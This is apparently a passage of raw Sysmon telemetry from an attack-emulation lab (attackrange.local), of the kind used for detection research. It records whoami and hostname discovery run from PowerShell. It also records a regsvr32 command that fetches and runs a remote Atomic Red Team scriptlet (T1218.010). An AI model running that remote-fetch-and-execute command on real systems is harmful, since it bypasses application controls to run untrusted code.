Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000032918Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.710{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36ED-6013-7A03-00000000A401}5540C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032917Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.710{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032916Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.710{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032915Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.710{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032914Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.710{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032913Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.710{FF16AF91-26BA-6013-2300-00000000A401}28122960C:\Windows\system32\csrss.exe{FF16AF91-36ED-6013-7A03-00000000A401}5540C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032912Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.710{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36ED-6013-7A03-00000000A401}5540C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5f0632a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5043b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64) 154100x800000000000000032911Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.714{FF16AF91-36ED-6013-7A03-00000000A401}5540C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000361150Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:03.425{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032949Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.960{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26B7-6013-1500-00000000A401}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032948Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.944{FF16AF91-26B5-6013-0B00-00000000A401}860900C:\Windows\system32\lsass.exe{FF16AF91-36F2-6013-7D03-00000000A401}7032C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032947Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.944{FF16AF91-26B5-6013-0B00-00000000A401}860900C:\Windows\system32\lsass.exe{FF16AF91-36F2-6013-7D03-00000000A401}7032C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032946Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.928{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-36F2-6013-7D03-00000000A401}7032C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032945Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.928{FF16AF91-26B7-6013-1500-00000000A401}14921564C:\Windows\system32\svchost.exe{FF16AF91-36F2-6013-7D03-00000000A401}7032C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032944Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032943Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032942Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032941Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26BA-6013-2300-00000000A401}28122960C:\Windows\system32\csrss.exe{FF16AF91-36F2-6013-7D03-00000000A401}7032C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032940Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032939Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-36F2-6013-7C03-00000000A401}22926708C:\Windows\system32\cmd.exe{FF16AF91-36F2-6013-7D03-00000000A401}7032C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032938Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.924{FF16AF91-36F2-6013-7D03-00000000A401}7032C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll C:\Users\Administrator\AppData\Local\Temp\chocolatey\ATTACKRANGE\Administrator{FF16AF91-26DF-6013-3A59-080000000000}0x8593a2HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{FF16AF91-36F2-6013-7C03-00000000A401}2292C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll" 10341000x800000000000000032937Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36F2-6013-7C03-00000000A401}2292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032936Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36F2-6013-7C03-00000000A401}2292C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFE178CA5C3) 10341000x800000000000000032935Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032934Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:06.913{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032933Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 